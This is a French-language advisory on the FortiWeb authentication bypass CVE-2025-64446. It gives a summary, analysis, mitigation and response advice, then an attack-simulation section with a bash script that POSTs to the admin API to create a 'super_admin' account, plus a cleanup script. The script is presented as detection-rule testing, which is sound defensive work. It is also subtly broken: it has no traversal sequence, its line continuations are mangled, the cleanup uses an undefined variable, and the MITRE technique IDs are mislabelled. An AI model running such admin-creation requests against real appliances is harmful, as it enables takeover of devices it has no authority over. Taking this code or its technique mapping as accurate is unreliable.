Fortinet FortiWeb Contournement d’authentification par Vulnérabilité de Traversée de Chemin (CVE-2025-64446)

Résumé

Une nouvelle vulnérabilité critique de contournement d’authentification révélée dans Fortinet FortiWeb, suivie sous CVE-2025-64446, permet à des attaquants non authentifiés de créer des comptes administratifs via une requête de traversal de chemin fabriquée. Selon des rapports disponibles publiquement, la vulnérabilité a été exploitée activement depuis début octobre 2025 et a ensuite été ajoutée aux catalogues de menaces officiels en raison de sa gravité. Une exploitation réussie offre un contrôle total sur l’appliance WAF affectée et peut permettre aux acteurs malveillants de s’infiltrer plus profondément dans les réseaux internes. Une enquête précoce sur le CVE-2025-64446 indique que les tentatives d’exploitation continuent de cibler massivement les appareils FortiWeb exposés à Internet.

Analyse du CVE-2025-64446

CVE-2025-64446 affecte plusieurs versions de FortiWeb, permettant aux attaquants d’envoyer une requête HTTP POST malveillante fabriquée au point de terminaison de l’API. La séquence de traversal de répertoire permet l’accès au script CGI administratif responsable de la création d’utilisateurs. Cela entraîne la création d’un nouveau compte admin sur l’appareil, octroyant un contrôle total à l’adversaire. Étant donné que les appareils FortiWeb fonctionnent en étroite collaboration avec d’autres produits Fortinet, cette vulnérabilité introduit une exposition du vaste écosystème, ce qui signifie qu’une intrusion réussie permettrait aux attaquants de se déplacer latéralement et de compromettre d’autres systèmes et services connectés. Les attaques précédemment observées sur FortiWeb (y compris l’activité autour de CVE-2025-25257) renforcent la probabilité d’un ciblage continu.

Atténuation

Fortinet a publié des correctifs pour toutes les versions affectées. L’atténuation immédiate du CVE-2025-64446 nécessite une mise à niveau vers la dernière version corrigée du produit, la version 8.0.2. Les atténuations recommandées incluent la restriction de l’accès à l’interface de gestion à des adresses IP de confiance ou à un VPN, l’application de l’AMF pour l’accès administratif, la rotation des identifiants pour tous les comptes admin FortiWeb, la surveillance de l’activité de l’API admin pour détecter des événements de création d’utilisateurs anormaux, et la suppression de l’exposition à la gestion HTTP/HTTPS depuis Internet. Les organisations devraient également suivre les procédures internes de test de correctifs pour éviter des perturbations opérationnelles.

Réponse

Les équipes de sécurité devraient confirmer l’inventaire des versions, appliquer les correctifs sans délai et désactiver l’accès de gestion externe si la mise à niveau immédiate n’est pas possible. Étant donné les tentatives d’exploitation actives, il est conseillé de renforcer la surveillance des requêtes POST suspectes visant le chemin API vulnérable. Si les comptes existants montrent des changements inattendus, rotationnez les identifiants et passez en revue les journaux d’audit à une fréquence accrue. La collecte des IOC CVE-2025-64446, la révision des modèles de trafic et leur corrélation avec l’activité récente d’exploitation amélioreront la visibilité et réduiront le risque.

Exécution de la simulation

Prérequis : Le contrôle pré-vol de télémétrie et de base doit être réussi.

Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer la télémétrie exacte attendue par la logique de détection.

• Narratif de l’attaque & Commandes :

  1. Reconnaissance (T1016.001) : L’attaquant découvre l’IP publique de l’appliance FortiWeb via des renseignements en source ouverte.
  2. Collecte d’identifiants / Escalade de privilèges (T1567.004) : Utilisant le CVE-2025-64446 découvert, l’attaquant fabrique une charge utile POST malveillante qui crée un nouvel utilisateur admin avec des privilèges complets.
  3. Exécution : L’attaquant envoie la requête fabriquée via HTTPS, en veillant à ce que le request_method soit POST et que le request_uri corresponde exactement à /api/v2.0/cmdb/system/admin.

• Script de test de régression :

  #!/usr/bin/env bash
  # Exploiter CVE-2025-64446 pour créer un nouveau compte admin FortiWeb
  # Ajuster les variables selon les besoins pour l'environnement cible
  
  TARGET="https://fortiweb.example.com"
  ENDPOINT="/api/v2.0/cmdb/system/admin"
  NEW_USER="eviladmin"
  NEW_PASS="P@ssw0rd!2025"
  # L'API vulnérable ne requiert pas d'authentification pour ce point de terminaison (selon CVE)
  PAYLOAD=$(cat <<EOF
  {
      "name": "${NEW_USER}",
      "password": "${NEW_PASS}",
      "privilege": "super_admin"
  }
  EOF
  )
  
  echo "[*] Envoi de POST malveillant à ${TARGET}${ENDPOINT}"
  curl -k -X POST "${TARGET}${ENDPOINT}" 
       -H "Content-Type: application/json" 
       -d "${PAYLOAD}" 
       -o /dev/null -s -w "HTTP %{http_code}n"
  
  echo "[*] Simulation d'attaque complète."

• Commandes de nettoyage :

  #!/usr/bin/env bash
  # Supprimer le compte admin malveillant créé pendant le test
  TARGET="https://fortiweb.example.com"
  ENDPOINT="/api/v2.0/cmdb/system/admin/${NEW_USER}"
  
  echo "[*] Suppression du compte admin test ${NEW_USER}"
  curl -k -X DELETE "${TARGET}${ENDPOINT}" 
       -H "Content-Type: application/json" 
       -o /dev/null -s -w "HTTP %{http_code}n"
  
  echo "[*] Nettoyage complet."